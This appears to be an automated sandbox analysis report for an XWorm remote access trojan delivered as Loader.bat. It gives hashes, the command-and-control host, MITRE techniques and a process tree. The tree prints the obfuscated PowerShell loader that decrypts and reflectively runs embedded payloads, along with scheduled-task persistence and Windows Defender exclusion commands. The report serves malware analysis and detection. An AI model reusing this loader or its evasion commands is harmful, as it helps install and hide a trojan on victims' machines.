xworm | 4570f682c283ce929e8e43642522440b9b874ea605cb2e14b53ec4296631e090

Analysis

max time kernel
405s
max time network
405s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
29/04/2024, 21:24

Sharing

Copy URL Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

Loader.bat
Size

289KB
MD5

15a31e6b43cde7114b2205ce0a38123a
SHA1

1fccd0820d54edb0e8d0f532e8ffd1c024f234d4
SHA256

4570f682c283ce929e8e43642522440b9b874ea605cb2e14b53ec4296631e090
SHA512

af8b38caa5c62b83f8060af340a27b3c2285f5e8d21cc6868c5289575bd4e5b6c1ff9aed888293d1cbf87011ba82d2a5ced0ff27b3c296cdabcc4b333e9453e5
SSDEEP

6144:E9qvCM2ntB9heJgUPXRNzufWQBxm8VaKC/w91wskhkIp26QuI6ZBEu6:zInFheJxzzpeCo9uhkWD26Uj

Score

10^/10

xworm persistence rat trojan

Malware Config

Extracted

Family

xworm

looking-memphis.gl.at.ply.gg:45119

Attributes

Install_directory
%Userprofile%
install_file
winhelper.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral1/memory/4320-44-0x0000024ABA4E0000-0x0000024ABA4F6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 11 IoCs

flow	pid	Process
11	4320	powershell.exe
25	4320	powershell.exe
103	4320	powershell.exe
144	4320	powershell.exe
173	4320	powershell.exe
184	4320	powershell.exe
196	4320	powershell.exe
202	4320	powershell.exe
217	4320	powershell.exe
237	4320	powershell.exe
351	4320	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winhelper.lnk	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winhelper.lnk	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1328	jdmlfb.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winhelper = "C:\\Users\\Admin\\winhelper.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 17 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "159"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1"	LogonUI.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133588995184653742"	chrome.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040"	LogonUI.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271"	LogonUI.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1"	LogonUI.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1162180587-977231257-2194346871-1000\{36C4C1E1-345D-40A5-B717-1DF641900297}	chrome.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3980	powershell.exe
3980	powershell.exe
4532	powershell.exe
4532	powershell.exe
4320	powershell.exe
4320	powershell.exe
5020	powershell.exe
5020	powershell.exe
752	powershell.exe
752	powershell.exe
1452	powershell.exe
1452	powershell.exe
996	powershell.exe
996	powershell.exe
1432	chrome.exe
1432	chrome.exe
4780	chrome.exe
4780	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3980	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeIncreaseQuotaPrivilege	4532	powershell.exe
Token: SeSecurityPrivilege	4532	powershell.exe
Token: SeTakeOwnershipPrivilege	4532	powershell.exe
Token: SeLoadDriverPrivilege	4532	powershell.exe
Token: SeSystemProfilePrivilege	4532	powershell.exe
Token: SeSystemtimePrivilege	4532	powershell.exe
Token: SeProfSingleProcessPrivilege	4532	powershell.exe
Token: SeIncBasePriorityPrivilege	4532	powershell.exe
Token: SeCreatePagefilePrivilege	4532	powershell.exe
Token: SeBackupPrivilege	4532	powershell.exe
Token: SeRestorePrivilege	4532	powershell.exe
Token: SeShutdownPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeSystemEnvironmentPrivilege	4532	powershell.exe
Token: SeRemoteShutdownPrivilege	4532	powershell.exe
Token: SeUndockPrivilege	4532	powershell.exe
Token: SeManageVolumePrivilege	4532	powershell.exe
Token: 33	4532	powershell.exe
Token: 34	4532	powershell.exe
Token: 35	4532	powershell.exe
Token: 36	4532	powershell.exe
Token: SeIncreaseQuotaPrivilege	4532	powershell.exe
Token: SeSecurityPrivilege	4532	powershell.exe
Token: SeTakeOwnershipPrivilege	4532	powershell.exe
Token: SeLoadDriverPrivilege	4532	powershell.exe
Token: SeSystemProfilePrivilege	4532	powershell.exe
Token: SeSystemtimePrivilege	4532	powershell.exe
Token: SeProfSingleProcessPrivilege	4532	powershell.exe
Token: SeIncBasePriorityPrivilege	4532	powershell.exe
Token: SeCreatePagefilePrivilege	4532	powershell.exe
Token: SeBackupPrivilege	4532	powershell.exe
Token: SeRestorePrivilege	4532	powershell.exe
Token: SeShutdownPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeSystemEnvironmentPrivilege	4532	powershell.exe
Token: SeRemoteShutdownPrivilege	4532	powershell.exe
Token: SeUndockPrivilege	4532	powershell.exe
Token: SeManageVolumePrivilege	4532	powershell.exe
Token: 33	4532	powershell.exe
Token: 34	4532	powershell.exe
Token: 35	4532	powershell.exe
Token: 36	4532	powershell.exe
Token: SeIncreaseQuotaPrivilege	4532	powershell.exe
Token: SeSecurityPrivilege	4532	powershell.exe
Token: SeTakeOwnershipPrivilege	4532	powershell.exe
Token: SeLoadDriverPrivilege	4532	powershell.exe
Token: SeSystemProfilePrivilege	4532	powershell.exe
Token: SeSystemtimePrivilege	4532	powershell.exe
Token: SeProfSingleProcessPrivilege	4532	powershell.exe
Token: SeIncBasePriorityPrivilege	4532	powershell.exe
Token: SeCreatePagefilePrivilege	4532	powershell.exe
Token: SeBackupPrivilege	4532	powershell.exe
Token: SeRestorePrivilege	4532	powershell.exe
Token: SeShutdownPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeSystemEnvironmentPrivilege	4532	powershell.exe
Token: SeRemoteShutdownPrivilege	4532	powershell.exe
Token: SeUndockPrivilege	4532	powershell.exe
Token: SeManageVolumePrivilege	4532	powershell.exe
Token: 33	4532	powershell.exe
Token: 34	4532	powershell.exe
Token: 35	4532	powershell.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe
1432	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1988	LogonUI.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4712 wrote to memory of 464	4712	cmd.exe	83
PID 4712 wrote to memory of 464	4712	cmd.exe	83
PID 464 wrote to memory of 4916	464	net.exe	84
PID 464 wrote to memory of 4916	464	net.exe	84
PID 4712 wrote to memory of 3980	4712	cmd.exe	88
PID 4712 wrote to memory of 3980	4712	cmd.exe	88
PID 3980 wrote to memory of 4532	3980	powershell.exe	89
PID 3980 wrote to memory of 4532	3980	powershell.exe	89
PID 3980 wrote to memory of 3056	3980	powershell.exe	92
PID 3980 wrote to memory of 3056	3980	powershell.exe	92
PID 3056 wrote to memory of 2840	3056	WScript.exe	93
PID 3056 wrote to memory of 2840	3056	WScript.exe	93
PID 2840 wrote to memory of 2240	2840	cmd.exe	95
PID 2840 wrote to memory of 2240	2840	cmd.exe	95
PID 2240 wrote to memory of 4260	2240	net.exe	96
PID 2240 wrote to memory of 4260	2240	net.exe	96
PID 2840 wrote to memory of 4320	2840	cmd.exe	97
PID 2840 wrote to memory of 4320	2840	cmd.exe	97
PID 4320 wrote to memory of 5020	4320	powershell.exe	99
PID 4320 wrote to memory of 5020	4320	powershell.exe	99
PID 4320 wrote to memory of 752	4320	powershell.exe	101
PID 4320 wrote to memory of 752	4320	powershell.exe	101
PID 4320 wrote to memory of 1452	4320	powershell.exe	103
PID 4320 wrote to memory of 1452	4320	powershell.exe	103
PID 4320 wrote to memory of 996	4320	powershell.exe	105
PID 4320 wrote to memory of 996	4320	powershell.exe	105
PID 1432 wrote to memory of 1368	1432	chrome.exe	112
PID 1432 wrote to memory of 1368	1432	chrome.exe	112
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 2568	1432	chrome.exe	113
PID 1432 wrote to memory of 3036	1432	chrome.exe	114
PID 1432 wrote to memory of 3036	1432	chrome.exe	114
PID 1432 wrote to memory of 1352	1432	chrome.exe	115
PID 1432 wrote to memory of 1352	1432	chrome.exe	115
PID 1432 wrote to memory of 1352	1432	chrome.exe	115

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4712
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:4916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2zT4oddNyOy8xUx/N5qsjXNWtcSidQa1mGBJTMFNSlI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHYQWFuEA6L5vyUWCNzFaQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ruvpy=New-Object System.IO.MemoryStream(,$param_var); $WKiPK=New-Object System.IO.MemoryStream; $aVbnN=New-Object System.IO.Compression.GZipStream($ruvpy, [IO.Compression.CompressionMode]::Decompress); $aVbnN.CopyTo($WKiPK); $aVbnN.Dispose(); $ruvpy.Dispose(); $WKiPK.Dispose(); $WKiPK.ToArray();}function execute_function($param_var,$param2_var){ $cYwXc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OwAMD=$cYwXc.EntryPoint; $OwAMD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$IQAYo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Loader.bat').Split([Environment]::NewLine);foreach ($iybba in $IQAYo) { if ($iybba.StartsWith(':: ')) { $xIAwp=$iybba.Substring(3); break; }}$payloads_var=[string[]]$xIAwp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3980
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_178_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_178.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4532
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_178.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:3056
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_178.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2840
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2240
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:4260
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2zT4oddNyOy8xUx/N5qsjXNWtcSidQa1mGBJTMFNSlI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('aHYQWFuEA6L5vyUWCNzFaQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ruvpy=New-Object System.IO.MemoryStream(,$param_var); $WKiPK=New-Object System.IO.MemoryStream; $aVbnN=New-Object System.IO.Compression.GZipStream($ruvpy, [IO.Compression.CompressionMode]::Decompress); $aVbnN.CopyTo($WKiPK); $aVbnN.Dispose(); $ruvpy.Dispose(); $WKiPK.Dispose(); $WKiPK.ToArray();}function execute_function($param_var,$param2_var){ $cYwXc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $OwAMD=$cYwXc.EntryPoint; $OwAMD.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_178.bat';$IQAYo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_178.bat').Split([Environment]::NewLine);foreach ($iybba in $IQAYo) { if ($iybba.StartsWith(':: ')) { $xIAwp=$iybba.Substring(3); break; }}$payloads_var=[string[]]$xIAwp.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4320
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5020
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:752
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\winhelper.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1452
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winhelper.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:996
      - C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jdmlfb.exe"
        6⤵
        Executes dropped EXE
        
        PID:1328
      - C:\Windows\SYSTEM32\shutdown.exe
        
        shutdown.exe /f /s /t 0
        6⤵
        
        PID:2192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcce57ab58,0x7ffcce57ab68,0x7ffcce57ab78
  2⤵
  PID:1368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:2
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1992 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2288 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:1352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2944 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:1
  2⤵
  PID:1676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:1
  2⤵
  PID:4160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4424 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:1
  2⤵
  PID:2852
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4548 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:4552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3656 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:1436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4576 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5044 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:4860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5076 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:1256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4764 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:1
  2⤵
  PID:4176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=3080 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4552 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  PID:4792
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3516 --field-trial-handle=2004,i,14550342556500182901,13316099629167772821,131072 /prefetch:8
  2⤵
  - Modifies registry class
  PID:4680
- C:\Program Files\Google\Chrome\Application\chrome.exe
